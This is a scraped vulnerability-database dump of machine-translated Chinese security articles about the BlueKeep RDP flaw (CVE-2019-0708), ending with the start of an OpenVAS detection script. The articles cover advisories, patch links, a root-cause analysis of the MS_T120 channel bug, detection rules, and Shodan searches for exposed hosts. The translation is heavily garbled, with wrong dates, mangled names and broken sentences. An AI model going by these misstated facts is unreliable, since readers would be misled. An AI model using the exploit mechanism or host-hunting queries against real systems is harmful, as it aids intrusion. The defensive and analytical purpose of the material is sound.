\nHack start large-scale scanning vulnerable devices \n5, the 2019 5 May 30, \nMicrosoft again released for CVE-2019-0708 vulnerability to do to patch alert, based on the vulnerability severity is strongly recommended that users upgrade as soon as possible to repair \n6, the 2019 Year 5 July 31, \nInternet open sources appear to cause the blue screen of PoC code, fighting like a security emergency response team has confirmed the PoC code availability \n7, the 2019 Year 6 on 8 May \nMetasploit the commercial version Start provide can lead to remote code execution Exploit module \n8, the 2019 Year 7 on 31 December \nCommercial exploit kits Canvas added CVE-2019-0708 Exploit module \n9, the 2019 Year 9 month 7 day \nThere have been open channels of the Metasploit CVE-2019-0708 Exploit module released, constitute a real worm threats. \nVulnerability Hazard \nSuccessful exploitation of this vulnerability an attacker can be on the target system execute arbitrary code. The attacker could then install programs; view, change, or delete data; or create full user permissions to the new account. \nThe scope of the impact \nProduct \nWindows [operating systems](<http://www.myhack58.com/Article/48/Article_048_1.htm>) \nVersion \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows Server 2003 has stopped maintenance \nWindows XP has stopped maintenance \nAssembly \nRemote Desktop Services \nSolution \nOfficial patch \nThrough the Windows [operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)in the Automatic Update feature to be updated \nFor the system version of the reference at the end of the list to download the patch to run the installation \nTemporary solution recommendations \n1, disable remote desktop services \n2, in the firewall for Remote Desktop Services port(3389)is blocked \n3, in Windows 7, Windows Server 2008, and Windows Server 2008 R2-enable network authentication \nReference \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nhttps://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&amp;isappinstalled=0 \nOfficial patch download \n[Operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)version \nPatch download link \nWindows 7 x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu \nWindows 7 x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu \nWindows Embedded Standard 7 for x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu \nWindows Embedded Standard 7 for x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu \nWindows Server 2008 x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu \nWindows Server 2008 Itanium \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu \nWindows Server 2008 x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu \nWindows Server 2008 R2 Itanium \n\n\n**[1] [[2]](<95881_2.htm>) [next](<95881_2.htm>)**\n", "edition": 1, "modified": "2019-09-07T00:00:00", "published": "2019-09-07T00:00:00", "id": "MYHACK58:62201995881", "href": "http://www.myhack58.com/Article/html/3/62/2019/95881.htm", "title": "Worms level vulnerability BlueKeep(CVE-2019-0708) EXP is released-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-15T15:21:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "1, Overview \n2019 5 May 14, Microsoft officially released the Remote Desktop Services Remote Desktop Services critical remote code execution vulnerability CVE-2019-0708 security patches affected Windows system version in with Remote Desktop enabled when the service is vulnerable to remote code execution attacks. The vulnerability does not require user interaction, i.e., the vulnerability can be exploited to initiate a worm type of attack, similar WannaCry\uff08Morgul\uff09ransomware worm event. Although currently not found the exploits, but after the attacker is likely to be the exploit was added to the malicious code, just like MS17-010\uff08Eternal Blue vulnerabilities, Microsoft is in 2017 3 \u6708 14 release MS17-010 vulnerability patches, 2017 5 May 12, WannaCry\uff08Morgul use of the Eternal Blue vulnerability to spread. \nAccording to the relevant data source statistics, at present, the global public network with nearly 300 multi-million computer to open the 3389 port, i.e. not to change the port of Remote Desktop Services, RDP, for not through the configuration of the reinforcing within the network of more large number of machines open the relevant port services. Therefore, the vulnerability may cause the Internet to a large area of worm propagation, botnet a large area of infection, also be formed within the network of a large area lateral of the mobile attack capability. \n2, the vulnerability described in \nVulnerability ID: CVE-2019-0708 \nThe vulnerability allows an unauthenticated attacker to use Remote Desktop Services to connect to the target system and send well-designed request, use its identity pre-authentication, no user interaction is required to confirm consent to receive a connection defect can be on the target system, execute arbitrary code, covering but not limited to setup, view, change, or delete the target data within the system, or created with the full user permissions to the new account. \nExploitation of this vulnerability need to meet the following conditions: \n1\\. In Windows operating system to enable the Remote Desktop Services Remote Desktop Services, and the failure to promptly install the update patch; and \n2. The attacker through RDP to the target system the Remote Desktop service to send a well-designed request. \n3, the affected range \nThe affected Windows operating system version: \nWindows XP SP3 x86 \nWindows XP Professional x64 edition SP2 \nWindows XP Embedded SP3 x86 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2003 SP2 x86 \nWindows Server 2003 x64 edition SP2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Embedded POSReady 2009 \nWindows Embedded Standard 2009 \n4, repair and mitigation recommendations \n1, as soon as possible to install the vulnerability patch, even if has been disabled Remote Desktop Services[1]. Fig. \n2, if you do not need to use the Remote Desktop service, it is recommended to disable the service. \n3, in an affected version of system enabled on network level authentication, NLA; to enable NLA, the attacker needs to use on the target system to a valid account on the Remote Desktop Services authentication, to successfully exploit the vulnerability. \n4, in the enterprise perimeter or border firewall to deploy the security policy that blocks TCP port 3389. \n5, Security days smart the methyl terminal defense system with an aptitude for production safety operation and maintenance system used in combination, can substantially reduce the exposed surface, forming a threat to defense response of the base frame. \nAppendix A: references \n[1] CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability \nhttps://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 \nhttps://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EA \nhttps://support.microsoft.com/en-us/help/4500331/windows-update-kb4500331 \n[2] Acknowledgements: the Remote Desktop Services Remote Code Execution Vulnerability(he UK's National Cyber Security Centre (NCSC)) \nhttps://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994154", "href": "http://www.myhack58.com/Article/html/3/62/2019/94154.htm", "title": "Windows remote code execution vulnerability(CVE-2019-0708)early warning-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-15T15:21:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "2019 5 May 14, Microsoft officially released security patches, repair the Windows Remote Desktop service remote code execution vulnerability, the vulnerability affects some older versions of Windows system. This vulnerability is pre-authentication and without user interaction, this means that this vulnerability by the network worm's way is utilized. Using this vulnerability, any malicious software are possible from the infected computer to spread to other vulnerable computers, in a manner and 2017 WannaCry malware spread in a similar way. \nThrough the assessment, the 360-CERT confirmed the vulnerability severity, and recommends users immediately patch update process. \n\n0x01 affect the scope of the \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows 2003 \nWindows XP \nWindows 8 and Windows 10 and later version users are not affected by this vulnerability. \n\n0x02 repair recommendations \nThrough the installation of 360 security guards ( http://weishi.360.cn/ )for a key update \nFor Windows 7 and Windows Server 2008 users, timely installation of Windows security updates that were released \nFor Windows 2003 and Windows XP users, to update system version \nInterim hazard mitigation measures: \nOpen the network authentication NLA\uff09 \n\n0x03 timeline \n2019-05-14 the official Microsoft Security Bulletin \n2019-05-15 360CERT warning \n\n0x04 reference links \nhttps://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/ \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994152", "href": "http://www.myhack58.com/Article/html/3/62/2019/94152.htm", "title": "CVE-2019-0708: Windows RDP service worms level vulnerability alerts-a vulnerability alert-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-15T15:21:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "In WannaCry two-year anniversary, Windows is again exposed to the presence of high-risk remote vulnerability. 5 on 15 May, Microsoft official released the 5, on security update patches a total fix 82 vulnerabilities, which contains for Remote Desktop RDP services remote code execution vulnerability CVE-2019-0708 the. \n! [](/Article/UploadPic/2019-5/201951519518699.jpg) \nAccording to the Microsoft Security Response Center MSRC published a blog post, the Remote Desktop Protocol RDP in itself is not easy to receive the attack, this vulnerability is pre-authentication, without user interaction. This means that the use of this vulnerability and any future malicious software are possible with the 2017 WannaCry malicious software all over the world in a similar manner, from vulnerable computers to spread to other computers. \nTo exploit the vulnerability, an attacker could install programs, view, change, or delete data, or create with full user permissions to the new account. This vulnerability exists temptation imaginable, as long as the POC release, it is possible to in the most people did not have time to update the case of the repetition of WannaCry it. \nBut so far, also did not find any malicious behavior exploit this vulnerability, GitHub appears on many take advantage of this message lie Star, fishing or prank. \n! [](/Article/UploadPic/2019-5/201951519518174. png) \nYou think is an exploit...... \n! [](/Article/UploadPic/2019-5/201951519518566. png) \nJust wanted to tell you: Never Gonna Give You Up. \nCVE-2019-0708 vulnerability scope: \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows Server 2003 has stopped maintenance \nWindows XP has stopped maintenance \nIn addition to Win8, Win 10 with almost all Windows versions are affected by this vulnerability. Although Microsoft has stopped the Windows 2003 and Windows XP support, but due to this vulnerability the degree of harm is high, Microsoft the repair patch covering all of the affected versions of Windows. \nSafety recommendations \n1. Temporary coping methods \nIn the affected versions of the system enable network level authentication, NLA; to enable NLA, the attacker needs to use on the target system to a valid account on the Remote Desktop Services authentication, to successfully exploit the vulnerability. \nMicrosoft's official recommendation, regardless of whether to open the NLA, should be updated as soon as possible, the complete elimination of the vulnerability. \n2. Security patches \nSince Win8 and Win 10 is not affected by CVE-2019-0708 vulnerability, so these users can be assured. For Win 7 and Server 2008 users, you can directly through the system automatically updates the installed vulnerability patches. If you have already closed the system automatically updates, can from the following links to download the corresponding version of the patch installation: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nFor Windows 2003 and Windows XP users, since the official has stopped support, not through auto update install the patch, you need to manually through the following address to download the security patches self install 360 security guards users can through the\u201cloophole repair\u201dfunction of the shortcut to install the patch: the \nhttps://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 \n\n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994162", "href": "http://www.myhack58.com/Article/html/3/62/2019/94162.htm", "title": "Windows re-aeration\u201cWannaCry\u201dlevel vulnerability CVE-2019-0708, cures XP, Win7-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-22T17:19:40", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "! [](/Article/UploadPic/2019-5/201952221409502. png) \n\nWrite in front of words \nAt Microsoft in May this year of the vulnerability Update Security Bulletin, reference was made to a Remote Desktop Protocol RDP for vulnerabilities. The reason we're here specifically for this vulnerability analysis, is because of this vulnerability the update relates to Windows XP and other Windows operating system, and it is well known, Windows XP has been for many years without ever updating. So why is Microsoft this time to fix for this high-risk vulnerability? Don't worry, we now take a look! \nAccording to Microsoft released security Bulletin, this is a very strict certification of security vulnerability, it will cause the attacker on the target device to achieve remote code execution, and implanted worms and other malicious software. This also means that, once the target tissue which are infected, the entire network system to the other is not subject to the security protection of computer equipment will also be\u201cspared\u201dof. In this security Bulletin, Microsoft mentioned the famous Internet Worm\u201cWannaCry\u201din. In 2017 in March, the Microsoft fix for the malware-related vulnerabilities MS17-010, but prior to that, many attackers are using\u201cWannaCry\u201dfor network attacks. \nIn view of the vulnerability of the security threat level high risk vulnerability, the attacker is likely to be in this period of time to develop the appropriate exploits to use the tool, the McAfee Advanced Threat Research team but also on the vulnerability and associated threat scenarios conducted in-depth analysis, we recommend that the majority of users as soon as possible to fix vulnerabilities CVE-2019-0708 the. \n\nAffected[OS](<http://www.myhack58.com/Article/48/Article_048_1.htm>) \nWindows 2003Windows XP 7Windows Server 2008Windows Server 2008 R2 \n\nThe RDP Protocol \nRemote Desktop Protocol RDP, Remote Desktop Protocol is a multi-channel multi-channel Protocol can help users, client, or\u201clocal computer\u201dwith the Microsoft Terminal Services Computer, the server or the\u201cremote computer\u201dthe establishment of a communication connection. Currently, the market most of the Windows are installed with Remote Desktop Protocol. Other[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)is also related to client software, such as Linux, FreeBSD, and Mac OS X, and so on. The Protocol is the International Telecommunication Union published an international standard multi-channel conferencing Protocol T. 120 is an extension. The RDP Protocol in Terminal Services after the launch there have been four versions, namely 4. Of 0, 5.0, and 5.1, and 5.2 in. In General, the version according to the version of windows determined. From the client's point of view, 5. X version provide the functionality the difference is not very large, relative to the 4. 0 version which provides a user with a password and log in directly, the client driver resource mapping, and client audio playback, up to 24-bit color display and FIPS compliant encryption level of the connection. In addition, from 4. 0 Protocol began to become available customers a carbonyl function are: high, medium, low three kinds of the data encryption level, the client to customize the initial login environment, the client printer mapping, client LPT port mapping client com port mapping, clipboard mapping, customer login, personalized settings(including the keyboard, display screen size, etc.). Version 7.0: this is the latest version, only support Windows Server 2008 R2 or Windows 7 and above versions. \n\nVulnerability overview \nA worm virus can infected the network within the system to self-replicate and spread, and the infected on the remote host to run automatically, without requiring the user to any additional interaction. If a malicious software is the main attack vector is the network, then it should be classified as worms. \nRemote Desktop Protocol RDP to define the communication between the two sides in a virtual channel between the data communication mode, to support the client to establish point to point connections. This virtual channel is a bidirectional data channel can be extended RDP function. Windows Server 2000 in RDP v5. 1 defines 32 types of static virtual channel\uff08SVC\uff09, but due to the which involved also to a large number of dynamic virtual channel DVC, so the available number of channels and types will be subject to certain restrictions. SVC is in the beginning of the session created in the session before the termination remain the same, but DVC is different, because it is according to the user needs to create and delete. \n\nVulnerability analysis \nVulnerability CVE-2019-0708 related to the RDP drive with. sys in _IcaBindVirtualChannels and _IcaRebindVirtualChannels it. We can see from the following figure to see the system initialize the RDP connection sequence, and security mechanisms to enable completion before the channel is established, this leads to a vulnerability, CVE-2019-0708 the can of worms, because it can be done by opening port 3389 in the destination within the network system to achieve self-replication and propagation. \n! [](/Article/UploadPic/2019-5/201952221409676. png) \nFirst give you a brief introduction\u201cMS_T120\u201dthis static virtual channel, which the RDP channel number is 31, in the GCC session initiation sequence. This is a Microsoft internal use of the channel name, and the client through a SVC to a request to establish connection, does not display on the\u201cMS_T120\u201dthis use of the channel information. \nThe following figure shows the GCC of the session Initialization Sequence of the channel request information, we can see which does not relate to any on MS_T120 channel information. \n! [](/Article/UploadPic/2019-5/201952221409844. png) \nBut in the GCC session initialization process, the client provides the channel name is not on the server side white list, so an attacker will be able to set another one named\u201cMS_T120\u201dSVC channel rather than before the number to 31 of the legitimate channel to make the target system heap memory corruption, or to achieve remote code execution. \nThe following figure shows the GCC of the session initialization process of the abnormal channel request\u201cMS_T120\u201dchannel number 4: the \n! [](/Article/UploadPic/2019-5/2019522214010337. png) \nMS_T120 channel management relates to the Assembly, we in the following figure for the label. MS_T120 the reference channel will be in the rdpwsx. the dll is created, the heap memory will be in rdpwp. sys allocated memory pool. When MS_T120 the reference channel in the channel number of the non-31 of the scenario is established, it will happen heap memory crash. \n! [](/Article/UploadPic/2019-5/2019522214010223. png) \nThe following figure shows the Microsoft of the vulnerability fix the situation, Microsoft in with. sys _IcaBindVirtualChannels and _IcaRebindVirtualChannels function in the client connection request section for the channel name\u201cMS_T120\u201ddetection code, and to ensure that the channel with the channel sequence 31 for binding. \n\n\n**[1] [[2]](<94234_2.htm>) [next](<94234_2.htm>)**\n", "edition": 1, "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "MYHACK58:62201994234", "href": "http://www.myhack58.com/Article/html/3/62/2019/94234.htm", "title": "Together we analyze this just to fix the RDP vulnerability, CVE-2019-0708-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-24T21:28:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Recently, with the CVE-2019-0708 vulnerability of the publication, most of the security community will be the loopholes as the highest priority to addressing the vulnerability. Mentioned bug fixes, it is difficult not to associate this front WannaCry and NotPetya disastrous consequences. And according to the previous experience, we know very well, the user often does not immediately fix the vulnerability, but requires a relatively long period of time. Therefore, for this high-risk vulnerabilities, we need to quickly develop the vulnerability detection rules. \nAbout CVE-2019-0708 vulnerability, there is a more critical but very important details of the vulnerability with the Remote Desktop Services Remote Desktop Services is about, which is on Windows by the Microsoft implementation of the Remote Desktop Protocol RDP to. The RDP Protocol itself is not a problem, I have to mention this, in order to avoid the recurrence of like WannaCry during the outbreak we see those hype. \n\u201cBlueKeep\u201dlabel initially by Kevin Beaumount use. The reason why I choose this label, there are two reasons: in order to obtain the reference information, at the same time be able to on Twitter to find relevant posts, we can't simply use CVE as a label unless you remove the dash on. BlueKeep this tag just makes tweeting easier. \n! [](/Article/UploadPic/2019-5/201952513833498. png) \nVulnerability impact analysis \nTo establish detection theory, we must consider two threat models, namely: \n1\\. Worm threat, similar to the WannaCry scene. \n2\\. APT attacker, the vulnerability as a more complex attack part, like the Eternal Blue EternalBlue and the SMB Protocol is only NotPetya catastrophic attack. \nIn order to identify the presence of risk assets, we will refer to by the Dragon provided the following table: \n! [](/Article/UploadPic/2019-5/201952513833958. png) \nCVE-2019-0708 can be used similar to WannaCry the large-scale initial visit? We quickly see the Shodan data, found on the network the presence of a large number of hosts, exposing 3389 port, and may run a vulnerable version of Windows. \n\nSearch the contents of the URL as follows: \n\u00b7 https://www.shodan.io/search?query=port%3A3389+os%3A%22Windows+7+or+8%22 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+2003 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+2008 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+os%3A%22Windows+XP%22 \nOverall, we can look for on the Internet expose RDP of 238. 5 million hosts, but it is not possible to verify this conclusion accuracy. \n! [](/Article/UploadPic/2019-5/201952513839135. png) \nSearch the contents of the URL as follows: https://www.shodan.io/search?query=Remote+Desktop+Protocol \nCited 2017 4 May 23, Dan Tentler's tweets,\u201cnot all hosts are Windows, and not all of these ports are SMB\u201din. We will this sentence into today like can be used,\u201cnot all of which 230 million hosts are Windows, and not all of these ports are vulnerable to CVE-2019-0708 affect of Service\u201d. If we apply the CVE-2019-0708 with WannaCry timeline comparison, we are now in MS-17010 has been released of the stage, but the Eternal Blue EternalBlue have not yet appeared, and therefore we are unable to scan to the next DoublePulsar it. Until such a PoC, we also cannot completely determine things direction of development. However, even if the threat arrives before WannaCry stage, we may also also will have 30 days to implement the defense, of course, this time might be less. \n! [](/Article/UploadPic/2019-5/201952513840966. png) \nAlthough we can discuss these audits to The whether the host can be an attacker of real use, and can analyze these host patch status, network segments, etc., but it is known that many companies are still running vulnerable versions of Windows, and the repair cycle for these systems may be more difficult. According to WannaCry of the data, we see that there are about 2. 4 million units more than the potential available hosts with 14 million units more than the suspected influence of the host, DoublePulsar before the event 3 weeks to be posted to the Internet. \nAt this stage, the greater the risk is within the organization using CVE-2019-0708 to the rapid fall of the host and lateral movement. And, since the exploit PoC in writing of the time has not yet appeared online as there are many fake, so we will use at our disposal all the tools to build the exploit before the detection. \nConsidering the above circumstances, as a defense, we can do three things: \n1\\. The deployment of active detection mode; \n2\\. Strictly required to fix the vulnerability or mitigate vulnerability risks; \n3\\. Reference to trusted researchers opinion, the tracking of the risk of the subsequent development. \nIn order to specifically explain this, I quote here Florian Roth's tweets: \n! [](/Article/UploadPic/2019-5/201952513840151. png) \nSpot fire: Sigma rules \nThe first rule, we referred to as Sigma #1, by Sigma GitHub Repo Markus the Neis provided, the rules for lateral movement of the technology T12010/remote service exploit https://attack.mitre.org/techniques/T1210/: the \n! [](/Article/UploadPic/2019-5/201952513841296. png) \nWithin an hour, similar to the rules of Sigma #2 by Roman Ranskyi in SOC Prime TDM on release, and provided to the community free use, the detection logic has been extended to the T1036/Masquerading https://attack.mitre.org/techniques/T1036/ and T1046/Web Services scanning https://attack.mitre.org/techniques/T1046/ the. \nBasically, we've got a TLP:WHITE and TLP:GREEN, and the catch in the loophole use before. However, this is enough to fully discover the aggressive behavior? \nFurther: machine learning \nNext, we explore machine learning how can provide us with some of the testing aspects of the advantages, but also to consider how Elastic the stack to create the solution. \nTheory: \nIn a defined time window, a host initiates a large number of RDP connections, and wherein the single target IP address too, can prove the suspect using the RDP Protocol as the propagation, worms of lateral movement and propagation. In the process, may be used with CVE-2019-0708 vulnerability related to the RDS vulnerability. \n\n\n**[1] [[2]](<94259_2.htm>) [[3]](<94259_3.htm>) [next](<94259_2.htm>)**\n", "edition": 1, "modified": "2019-05-25T00:00:00", "published": "2019-05-25T00:00:00", "id": "MYHACK58:62201994259", "href": "http://www.myhack58.com/Article/html/3/62/2019/94259.htm", "title": "CVE-2019-0708 vulnerability impact analysis and the use of a variety of rules to detect method-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-03T09:28:02", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "! [](/Article/UploadPic/2019-6/20196312454415. png) \n\n\n0x00 description \n2019 5 August 31, 360 is detected on github someone posted a lead to a remote denial of Service POC code(https://github.com/n1xbyte/CVE-2019-0708)and for windows server 2008 R2 x64 demo video, the proven POC code real and effective. An attacker can use to spread the code of the system to a remote denial-of-service attack or to modify the code to achieve remote code execution effect. \n! [](/Article/UploadPic/2019-6/20196312456581. png) \n\n0x01 safety recommendations \n1. Install 360 security guards a key update. \n2. To avoid the Remote Desktop Services RDP, the default port is 3389 exposed on the public Internet, such as for remote operation and maintenance convenient and indeed necessary to open, you can use VPN to log in to access, and close the 445 and 139, and 135 and other unnecessary ports. \n3. Use 360 provides RDP remote vulnerability Non-Destructive Testing Tool(https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip)internal and external network machine scan to detect and repair the loopholes in the machine. For the temporary can not be networked machine to use the 360 offline immunization tool(http://dl.360safe.com/leakfixer/360SysVulTerminator_CVE-2019-0708.exe)to detect the repair. \n\n", "edition": 1, "modified": "2019-06-03T00:00:00", "published": "2019-06-03T00:00:00", "id": "MYHACK58:62201994388", "href": "http://www.myhack58.com/Article/html/3/62/2019/94388.htm", "title": "Alert Windows RDP remote vulnerability POC propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-26T11:45:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "By 2019 05 on 15 August, Microsoft released 5 December patch update list, in which the presence of a marked to severe RDP Remote Desktop Services remote code execution vulnerability, an attacker can exploit this vulnerability remotely without user authentication by sending the special structure of the malicious data on the target system to execute malicious code, thereby acquiring the machine full control. \nFrom the patch analysis, vulnerability analysis, and then to the POC release, and then is EXP video release, time has passed 2 months+10 days. \nAnd this series also ushered in the first 4 rounds. \nFirst bullet: point Remote Desktop Services remote code execution vulnerability POC open \nThe second bomb: Remote Desktop Services vulnerability analysis and detection code is disclosed, the Dark Net has begun selling may be the use of EXP \nThird bullet: Microsoft re-notice: to remind you to update the system in order to prevent the worm \nBecause left to the user to patch the time has not much. in. \nSince last week see snow conference, from Tecent keenlab the gangster of the PPT occur in the network after. \n! [](/Article/UploadPic/2019-7/201972616547738. png) \n! [](/Article/UploadPic/2019-7/201972616547946.jpg) \nDownload: \nhttps://github.com/blackorbird/APT_REPORT/blob/master/exploit_report/%23bluekeep%20RDP%20from%20patch%20to%20remote%20code%20execution.pdf \nForeign security personnel suddenly opens up to disclose the EXP is constructed of a heat wave \n! [](/Article/UploadPic/2019-7/201972616548254. png) \n! [](/Article/UploadPic/2019-7/201972616548834.jpg) \nWhile U.S. companies Immunity, a company specializing in the sale of commercial penetration testing kit company, finally unable to bear it, resorted to the big move, the public Twitter huckster. \n! [](/Article/UploadPic/2019-7/201972616548106. png) \nWhile Canvas is one from Dave Aitel ImmunitySec the company's commercial vulnerability exploitation tool. It includes more than 370 EXP, it also comes with complete code, as well as some of the 0day vulnerability. \n\uff08PS: the main He than Metasploit commercial version is also cheap.\uff09 \nWherein the demonstration video below. \nhttps://vimeo.com/349688256/aecbf5cac5 \nVisible indeed weapons of the time. \nImmunity CANVAS BlueKeep module can achieve remote code execution \u2013 i.e., in the infected host to open a shell and execute the command. \n! [](/Article/UploadPic/2019-7/201972616548793.jpg) \nAlthough the CANVAS of the license cost in the thousands to tens of thousands of dollars between, but hackers already know how to pirated or legally purchased penetration testing tools, such as Cobalt Strike to. \nIt means that the world hackers may have been eyeing the CANVAS, upon which wealthy people purchase, resulting in a new version of the tool is compromised, waiting to give their will be a crack Holocaust. \nHowever, I still don't have money, the rich can start your show. \n! [](/Article/UploadPic/2019-7/201972616548518.jpg) \nhttps://www.immunityinc.com/products/canvas/ \nIn the Immunity of the BlueKeep the use of the module leak before the company and users still have time to repair the system. \nAs is well known, BlueeKeep affects Windows XP, Windows Vista, Windows 7, Windows Server 2003 and Windows Server 2008. \nSystem patch, and the mitigation and workarounds \u2013 see here. \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nWindows 10 version is not affected. \n\n", "edition": 1, "modified": "2019-07-26T00:00:00", "published": "2019-07-26T00:00:00", "id": "MYHACK58:62201995234", "href": "http://www.myhack58.com/Article/html/3/62/2019/95234.htm", "title": "Began openly selling a...the United States company is selling weapons of the BlueKeep the exploit-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-05T16:27:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "This host is running Microsoft Windows Remote Desktop Services\n and is prone to the remote code execution vulnerability known as ", "modified": "2020-06-04T00:00:00", "published": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310108611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108611", "type": "openvas", "title": "Microsoft Windows Remote Desktop Services 'CVE-2019-0708' Remote Code Execution Vulnerability (BlueKeep) - (Remote Active)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108611\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0708\");\n script_bugtraq_id(108273);\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-05 11:44:28 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Remote Desktop Services 'CVE-2019-0708' Remote Code Execution Vulnerability (BlueKeep) - (Remote Active)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"ms_rdp_detect.nasl\");\n script_require_ports(\"Services/ms-wbt-server\", 3389);\n script_mandatory_keys(\"msrdp/detected\");\n\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499164\");\n 